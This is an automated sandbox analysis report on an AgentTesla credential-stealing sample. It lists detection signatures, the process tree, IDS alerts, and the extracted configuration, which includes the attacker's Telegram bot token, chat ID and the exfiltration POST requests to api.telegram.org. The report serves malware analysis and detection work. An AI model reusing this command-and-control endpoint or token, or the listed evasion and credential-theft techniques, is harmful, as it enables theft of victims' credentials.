Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xnlP06YunJ.exe

Overview

General Information

Sample name:xnlP06YunJ.exe
renamed because original name is a hash value
Original sample name:3301c867bfc564fad83be393a67e00cf4615b436940db9ed0728b3d4a523e040.exe
Analysis ID:1632360
MD5:a76f2b7c0390e364909268037328a880
SHA1:2177eb596046f6f3a0fd743cad0a438c990fdde4
SHA256:3301c867bfc564fad83be393a67e00cf4615b436940db9ed0728b3d4a523e040
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • xnlP06YunJ.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\xnlP06YunJ.exe" MD5: A76F2B7C0390E364909268037328A880)
    • cmd.exe (PID: 6784 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 6948 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
    • xnlP06YunJ.exe (PID: 524 cmdline: "C:\Users\user\Desktop\xnlP06YunJ.exe" MD5: A76F2B7C0390E364909268037328A880)
    • cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 5776 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage?chat_id=7103094488"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1158237609.0000000005DB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000004.00000002.2109400212.00000000028BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 10 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.xnlP06YunJ.exe.5db0000.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.xnlP06YunJ.exe.5db0000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\xnlP06YunJ.exe", ParentImage: C:\Users\user\Desktop\xnlP06YunJ.exe, ParentProcessId: 6616, ParentProcessName: xnlP06YunJ.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 6784, ProcessName: cmd.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\xnlP06YunJ.exe", ParentImage: C:\Users\user\Desktop\xnlP06YunJ.exe, ParentProcessId: 6616, ParentProcessName: xnlP06YunJ.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 6784, ProcessName: cmd.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T22:51:10.368588+010028517791Malware Command and Control Activity Detected192.168.2.749683149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T22:51:10.368588+010028528151Malware Command and Control Activity Detected192.168.2.749683149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T22:51:11.108511+010028542811A Network Trojan was detected149.154.167.220443192.168.2.749683TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T22:51:09.625936+010018100081Potentially Bad Traffic192.168.2.749683149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: ipconfig.exe.5776.7.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage?chat_id=7103094488"}
                  Source: xnlP06YunJ.exe.524.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendMessage"}
                  Multi AV Scanner detection for submitted file
                  Source: xnlP06YunJ.exeVirustotal: Detection: 72%Perma Link
                  Source: xnlP06YunJ.exeReversingLabs: Detection: 60%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: xnlP06YunJ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49682 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49683 version: TLS 1.2
                  Source: xnlP06YunJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4x nop then jmp 06BCF618h0_2_06BCF560

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49683 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.7:49683 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.7:49683 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.7:49683
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: POST /bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5d984054af83Host: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                  Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd5d984054af83Host: api.telegram.orgContent-Length: 980Expect: 100-continueConnection: Keep-Alive
                  Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: xnlP06YunJ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: xnlP06YunJ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: xnlP06YunJ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: xnlP06YunJ.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: xnlP06YunJ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: xnlP06YunJ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: xnlP06YunJ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: xnlP06YunJ.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: xnlP06YunJ.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: xnlP06YunJ.exeString found in binary or memory: http://ocsp.digicert.com0
                  Source: xnlP06YunJ.exeString found in binary or memory: http://ocsp.digicert.com0A
                  Source: xnlP06YunJ.exeString found in binary or memory: http://ocsp.digicert.com0C
                  Source: xnlP06YunJ.exeString found in binary or memory: http://ocsp.digicert.com0X
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: xnlP06YunJ.exeString found in binary or memory: http://www.digicert.com/CPS0
                  Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/
                  Source: xnlP06YunJ.exe, 00000004.00000002.2109400212.00000000028C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7351654760:AAFbpZoZSrKZKoCJV2by7hbyBL3xnGEoUrU/sendDocument
                  Source: xnlP06YunJ.exeString found in binary or memory: https://github.com/StefH/System.Linq.Dynamic.Core/issues/358
                  Source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: xnlP06YunJ.exeString found in binary or memory: https://github.com/mono/linker#link-xml-file-examples
                  Source: xnlP06YunJ.exeString found in binary or memory: https://github.com/mono/mono/issues/12917
                  Source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                  Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.7:49682 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49683 version: TLS 1.2
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C44BC8 NtResumeThread,0_2_06C44BC8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C44BC3 NtResumeThread,0_2_06C44BC3
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_01A7ACD00_2_01A7ACD0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_01A71AA10_2_01A71AA1
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_01A7ACC00_2_01A7ACC0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_01A7B6600_2_01A7B660
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_01A71AA10_2_01A71AA1
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_066BF7F00_2_066BF7F0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_066BFAC00_2_066BFAC0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_066BE2B80_2_066BE2B8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_066A00400_2_066A0040
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_066A00220_2_066A0022
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_066BE8000_2_066BE800
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BCD6680_2_06BCD668
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC8B900_2_06BC8B90
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC5EEF0_2_06BC5EEF
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC8C540_2_06BC8C54
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06BC8B8B0_2_06BC8B8B
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 0_2_06C400400_2_06C40040
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D991084_2_00D99108
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D9F2884_2_00D9F288
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D994504_2_00D99450
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D955C04_2_00D955C0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D9A5384_2_00D9A538
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D968F84_2_00D968F8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D92C884_2_00D92C88
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D9DDA84_2_00D9DDA8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D99D204_2_00D99D20
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D9E1584_2_00D9E158
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D952784_2_00D95278
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D954E44_2_00D954E4
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D9A5294_2_00D9A529
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D968E84_2_00D968E8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D929BD4_2_00D929BD
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D92A004_2_00D92A00
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_00D9DD9F4_2_00D9DD9F
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CBE284_2_064CBE28
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C26B14_2_064C26B1
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C07124_2_064C0712
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C7D504_2_064C7D50
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CCA404_2_064CCA40
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CB3284_2_064CB328
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CDBC04_2_064CDBC0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C58404_2_064C5840
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CB9584_2_064CB958
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C91184_2_064C9118
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CEE704_2_064CEE70
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CAED84_2_064CAED8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C96E74_2_064C96E7
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C9FE84_2_064C9FE8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C64864_2_064C6486
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C64904_2_064C6490
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CD5684_2_064CD568
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C6DA04_2_064C6DA0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C322A4_2_064C322A
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CCA304_2_064CCA30
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CAAA04_2_064CAAA0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CA3A84_2_064CA3A8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064CDBB04_2_064CDBB0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C58304_2_064C5830
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C88D84_2_064C88D8
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C81584_2_064C8158
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C81684_2_064C8168
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_064C91084_2_064C9108
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_065552004_2_06555200
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_065556C04_2_065556C0
                  Source: C:\Users\user\Desktop\xnlP06YunJ.exeCode function: 4_2_06554DF14_2_06554DF1
                  Source: xnlP06YunJ.exeStatic PE information: invalid certificate
                  Source: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1153257947.000000000452F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename77d62c29-4ea5-4d42-a3b6-c31fbd3b2ada.exe4 vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1153257947.000000000452F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBcsvlqaj.dll" vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.000000000377B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename77d62c29-4ea5-4d42-a3b6-c31fbd3b2ada.exe4 vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1156603078.0000000005980000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBcsvlqaj.dll" vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1139963777.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000000.857119340.0000000000F59000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKqjoqlc.exe< vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBcsvlqaj.dll" vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs xnlP06YunJ.exe
                  Source: xnlP06YunJ.exe, 00000004.00000002.2105496167.0000000000902000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename77d62c29-4ea5-4d42-a3b6-c31fbd3b2ada.exe4 vs xnlP06YunJ.exe
